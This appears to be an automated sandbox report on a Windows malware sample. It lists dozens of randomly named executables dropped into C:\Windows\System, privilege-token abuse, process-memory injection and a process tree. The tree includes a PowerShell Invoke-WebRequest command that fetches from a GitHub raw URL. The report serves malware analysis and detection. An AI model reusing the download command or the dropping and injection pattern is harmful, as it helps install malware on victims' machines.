File created C:\Windows\System\YShxzJV.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YHCmssj.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ukMxOhY.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DmrPYgo.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lHfSJSx.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ktNnzsp.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SkIxnbk.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OipHFrP.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qVzyvMz.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EmuuhdQ.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vQhAZcr.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MTVpNDG.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bpRPFFG.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QJvzHpx.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JRGjKof.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UJDQmvz.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cwQvbXt.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JWNlXuP.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Wzadepi.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IrETUGZ.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UZAHDso.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EZtbQiW.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MGQKMQw.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YzzzfXr.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bjceWRo.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EvBdDOE.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wydlthY.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FQBveYt.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qFbGVaA.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZOHFbCQ.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rljfCyF.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ySsZjrV.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vegUWkB.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GBNjLoD.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ceSUKAq.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LrbrVrC.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UABMvQJ.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mSmkBOr.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IhJUtgS.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YGyQQHr.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SutYAeu.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KLsrZuZ.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cCThqHa.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bAAoUly.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jFXhFyk.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eyvFjeW.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CbnYDPb.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tvSwZev.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NiUoNcV.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jRXaPfZ.exe C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1000 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1000 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1000 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\EGNcEww.exe
PID 1000 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\EGNcEww.exe
PID 1000 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\aBjDFgB.exe
PID 1000 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\aBjDFgB.exe
PID 1000 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\XZurXJK.exe
PID 1000 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\XZurXJK.exe
PID 1000 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\mBvLyfK.exe
PID 1000 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\mBvLyfK.exe
PID 1000 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\DMxWrra.exe
PID 1000 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\DMxWrra.exe
PID 1000 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\kIWtHjZ.exe
PID 1000 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\kIWtHjZ.exe
PID 1000 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\XLHGrSt.exe
PID 1000 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\XLHGrSt.exe
PID 1000 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\yEGriTw.exe
PID 1000 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\yEGriTw.exe
PID 1000 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\gtHSbER.exe
PID 1000 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\gtHSbER.exe
PID 1000 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\ZAffQWP.exe
PID 1000 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\ZAffQWP.exe
PID 1000 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\qWxgkCu.exe
PID 1000 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\qWxgkCu.exe
PID 1000 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\nIHjXjJ.exe
PID 1000 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\nIHjXjJ.exe
PID 1000 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\RNJGaYr.exe
PID 1000 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\RNJGaYr.exe
PID 1000 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\wAxzair.exe
PID 1000 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\wAxzair.exe
PID 1000 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\iBkIpAE.exe
PID 1000 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\iBkIpAE.exe
PID 1000 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\EsFuPGD.exe
PID 1000 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\EsFuPGD.exe
PID 1000 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\sAHKWry.exe
PID 1000 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\sAHKWry.exe
PID 1000 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\HNISsuw.exe
PID 1000 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\HNISsuw.exe
PID 1000 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\ZOWChDr.exe
PID 1000 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\ZOWChDr.exe
PID 1000 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\HMTdzyw.exe
PID 1000 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\HMTdzyw.exe
PID 1000 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\PhpdMap.exe
PID 1000 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\PhpdMap.exe
PID 1000 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\XsvdTeP.exe
PID 1000 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\XsvdTeP.exe
PID 1000 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\ibqjdFd.exe
PID 1000 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\ibqjdFd.exe
PID 1000 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\PgMVAQi.exe
PID 1000 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\PgMVAQi.exe
PID 1000 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\QGQuexY.exe
PID 1000 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\QGQuexY.exe
PID 1000 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\HDMtEKK.exe
PID 1000 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\HDMtEKK.exe
PID 1000 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\qNqSUcz.exe
PID 1000 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\qNqSUcz.exe
PID 1000 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\KPZcOTx.exe
PID 1000 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\KPZcOTx.exe
PID 1000 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\JxNtYwE.exe
PID 1000 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\JxNtYwE.exe
PID 1000 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\EynFELo.exe
PID 1000 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\EynFELo.exe
PID 1000 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\HDhOXsB.exe
PID 1000 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\HDhOXsB.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\EGNcEww.exe

C:\Windows\System\EGNcEww.exe

C:\Windows\System\aBjDFgB.exe

C:\Windows\System\aBjDFgB.exe

C:\Windows\System\XZurXJK.exe

C:\Windows\System\XZurXJK.exe

C:\Windows\System\mBvLyfK.exe

C:\Windows\System\mBvLyfK.exe

C:\Windows\System\DMxWrra.exe

C:\Windows\System\DMxWrra.exe

C:\Windows\System\kIWtHjZ.exe

C:\Windows\System\kIWtHjZ.exe

C:\Windows\System\XLHGrSt.exe

C:\Windows\System\XLHGrSt.exe

C:\Windows\System\yEGriTw.exe

C:\Windows\System\yEGriTw.exe

C:\Windows\System\gtHSbER.exe

C:\Windows\System\gtHSbER.exe

C:\Windows\System\ZAffQWP.exe

C:\Windows\System\ZAffQWP.exe

C:\Windows\System\qWxgkCu.exe

C:\Windows\System\qWxgkCu.exe

C:\Windows\System\nIHjXjJ.exe

C:\Windows\System\nIHjXjJ.exe

C:\Windows\System\RNJGaYr.exe

C:\Windows\System\RNJGaYr.exe

C:\Windows\System\wAxzair.exe

C:\Windows\System\wAxzair.exe

C:\Windows\System\iBkIpAE.exe

C:\Windows\System\iBkIpAE.exe

C:\Windows\System\EsFuPGD.exe

C:\Windows\System\EsFuPGD.exe

C:\Windows\System\sAHKWry.exe

C:\Windows\System\sAHKWry.exe

C:\Windows\System\HNISsuw.exe

C:\Windows\System\HNISsuw.exe

C:\Windows\System\ZOWChDr.exe

C:\Windows\System\ZOWChDr.exe

C:\Windows\System\HMTdzyw.exe

C:\Windows\System\HMTdzyw.exe

C:\Windows\System\PhpdMap.exe

C:\Windows\System\PhpdMap.exe

C:\Windows\System\XsvdTeP.exe

C:\Windows\System\XsvdTeP.exe

C:\Windows\System\ibqjdFd.exe

C:\Windows\System\ibqjdFd.exe

C:\Windows\System\PgMVAQi.exe

C:\Windows\System\PgMVAQi.exe

C:\Windows\System\QGQuexY.exe

C:\Windows\System\QGQuexY.exe

C:\Windows\System\HDMtEKK.exe

C:\Windows\System\HDMtEKK.exe

C:\Windows\System\qNqSUcz.exe

C:\Windows\System\qNqSUcz.exe

C:\Windows\System\KPZcOTx.exe

C:\Windows\System\KPZcOTx.exe

C:\Windows\System\JxNtYwE.exe

C:\Windows\System\JxNtYwE.exe

C:\Windows\System\EynFELo.exe

C:\Windows\System\EynFELo.exe

C:\Windows\System\HDhOXsB.exe

C:\Windows\System\HDhOXsB.exe

C:\Windows\System\TCdjXnj.exe

C:\Windows\System\TCdjXnj.exe

C:\Windows\System\rBaUMtP.exe

C:\Windows\System\rBaUMtP.exe

C:\Windows\System\LpnZXBl.exe

C:\Windows\System\LpnZXBl.exe

C:\Windows\System\GsHMuGH.exe

C:\Windows\System\GsHMuGH.exe

C:\Windows\System\HwHofeo.exe

C:\Windows\System\HwHofeo.exe

C:\Windows\System\cTgytRb.exe

C:\Windows\System\cTgytRb.exe

C:\Windows\System\XePaCLS.exe

C:\Windows\System\XePaCLS.exe

C:\Windows\System\BoEOExP.exe

C:\Windows\System\BoEOExP.exe

C:\Windows\System\FRQBNUG.exe

C:\Windows\System\FRQBNUG.exe

C:\Windows\System\BvqjUbO.exe

C:\Windows\System\BvqjUbO.exe

C:\Windows\System\IOPDlib.exe

C:\Windows\System\IOPDlib.exe

C:\Windows\System\VujSXcL.exe

C:\Windows\System\VujSXcL.exe

C:\Windows\System\QwwdkjE.exe

C:\Windows\System\QwwdkjE.exe

C:\Windows\System\OshpavU.exe

C:\Windows\System\OshpavU.exe

C:\Windows\System\wsNxkgP.exe

C:\Windows\System\wsNxkgP.exe

C:\Windows\System\YnoTzPm.exe

C:\Windows\System\YnoTzPm.exe

C:\Windows\System\bbtuklJ.exe

C:\Windows\System\bbtuklJ.exe

C:\Windows\System\PUcoguV.exe

C:\Windows\System\PUcoguV.exe

C:\Windows\System\jUbuQHA.exe

C:\Windows\System\jUbuQHA.exe

C:\Windows\System\khUhOZW.exe

C:\Windows\System\khUhOZW.exe

C:\Windows\System\SxLZgAo.exe

C:\Windows\System\SxLZgAo.exe

C:\Windows\System\EeJSJUw.exe

C:\Windows\System\EeJSJUw.exe

C:\Windows\System\frQMklf.exe

C:\Windows\System\frQMklf.exe

C:\Windows\System\vGBdkEK.exe

C:\Windows\System\vGBdkEK.exe

C:\Windows\System\CvBEJsH.exe

C:\Windows\System\CvBEJsH.exe

C:\Windows\System\GlKezNU.exe

C:\Windows\System\GlKezNU.exe

C:\Windows\System\iLRAvBK.exe

C:\Windows\System\iLRAvBK.exe

C:\Windows\System\VGhsuJk.exe

C:\Windows\System\VGhsuJk.exe

C:\Windows\System\FQBveYt.exe

C:\Windows\System\FQBveYt.exe

C:\Windows\System\hHFNJbN.exe

C:\Windows\System\hHFNJbN.exe

C:\Windows\System\rcNBrQt.exe

C:\Windows\System\rcNBrQt.exe

C:\Windows\System\avcPEGG.exe

C:\Windows\System\avcPEGG.exe

C:\Windows\System\IPmTTGm.exe

C:\Windows\System\IPmTTGm.exe

C:\Windows\System\YsLMuQL.exe

C:\Windows\System\YsLMuQL.exe

C:\Windows\System\UwnrtQn.exe

C:\Windows\System\UwnrtQn.exe

C:\Windows\System\JuJwkjp.exe

C:\Windows\System\JuJwkjp.exe

C:\Windows\System\bmKSfPb.exe

C:\Windows\System\bmKSfPb.exe

C:\Windows\System\LseIvcJ.exe

C:\Windows\System\LseIvcJ.exe

C:\Windows\System\uDJoPqL.exe

C:\Windows\System\uDJoPqL.exe

C:\Windows\System\nUAVwOw.exe

C:\Windows\System\nUAVwOw.exe

C:\Windows\System\xhUIevW.exe

C:\Windows\System\xhUIevW.exe

C:\Windows\System\WftthxX.exe

C:\Windows\System\WftthxX.exe

C:\Windows\System\XQyuDYx.exe

C:\Windows\System\XQyuDYx.exe

C:\Windows\System\usySpiT.exe

C:\Windows\System\usySpiT.exe

C:\Windows\System\zcjPHwz.exe

C:\Windows\System\zcjPHwz.exe

C:\Windows\System\eeaMKeH.exe

C:\Windows\System\eeaMKeH.exe

C:\Windows\System\ktmYaBk.exe

C:\Windows\System\ktmYaBk.exe

C:\Windows\System\DEFcJbR.exe

C:\Windows\System\DEFcJbR.exe

C:\Windows\System\joeuduU.exe

C:\Windows\System\joeuduU.exe

C:\Windows\System\bPLMoCa.exe

C:\Windows\System\bPLMoCa.exe

C:\Windows\System\sIhShwc.exe

C:\Windows\System\sIhShwc.exe

C:\Windows\System\xcdQhNb.exe

C:\Windows\System\xcdQhNb.exe

C:\Windows\System\awdrefl.exe

C:\Windows\System\awdrefl.exe

C:\Windows\System\WsaWnAO.exe

C:\Windows\System\WsaWnAO.exe

C:\Windows\System\MfrFvUO.exe

C:\Windows\System\MfrFvUO.exe

C:\Windows\System\TSkIgaD.exe

C:\Windows\System\TSkIgaD.exe

C:\Windows\System\HVjZRiq.exe

C:\Windows\System\HVjZRiq.exe

C:\Windows\System\zGsPJfI.exe

C:\Windows\System\zGsPJfI.exe

C:\Windows\System\zIJEAgC.exe

C:\Windows\System\zIJEAgC.exe

C:\Windows\System\rralHUP.exe

C:\Windows\System\rralHUP.exe

C:\Windows\System\stHHXZO.exe

C:\Windows\System\stHHXZO.exe

C:\Windows\System\iRPjQsV.exe

C:\Windows\System\iRPjQsV.exe

C:\Windows\System\QdmQxHH.exe

C:\Windows\System\QdmQxHH.exe

C:\Windows\System\znrnvbD.exe

C:\Windows\System\znrnvbD.exe

C:\Windows\System\eVSyJMZ.exe

C:\Windows\System\eVSyJMZ.exe

C:\Windows\System\cmIBXqq.exe

C:\Windows\System\cmIBXqq.exe

C:\Windows\System\DJzkaLh.exe

C:\Windows\System\DJzkaLh.exe

C:\Windows\System\yOsCSOd.exe

C:\Windows\System\yOsCSOd.exe

C:\Windows\System\RBeUqff.exe

C:\Windows\System\RBeUqff.exe

C:\Windows\System\JznIPaf.exe

C:\Windows\System\JznIPaf.exe

C:\Windows\System\HAmakHN.exe

C:\Windows\System\HAmakHN.exe

C:\Windows\System\EGazKId.exe

C:\Windows\System\EGazKId.exe

C:\Windows\System\XbbroKN.exe

C:\Windows\System\XbbroKN.exe

C:\Windows\System\nvhEuTG.exe

C:\Windows\System\nvhEuTG.exe

C:\Windows\System\bedMNxQ.exe

C:\Windows\System\bedMNxQ.exe

C:\Windows\System\ZzrIiZT.exe

C:\Windows\System\ZzrIiZT.exe

C:\Windows\System\wLtdUvm.exe

C:\Windows\System\wLtdUvm.exe

